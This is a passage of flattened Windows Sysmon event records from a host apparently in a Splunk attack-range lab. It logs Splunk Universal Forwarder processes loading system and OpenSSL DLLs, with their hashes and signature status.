Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.876{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.609{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B675F3DA9342261C3D8F04FAA7F870D9,SHA256=03C4F755B0E2F68DD11FA4027EB7CF5A267B5C0E846DB95BDD0BCB9084936D80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.046{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000098608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.046{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.046{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 10341000x800000000000000098716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.703{326FD73D-C0B3-6294-310B-000000005502}40166512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.703{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.703{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.562{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000098704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:47.546{326FD73D-C0B3-6294-310B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 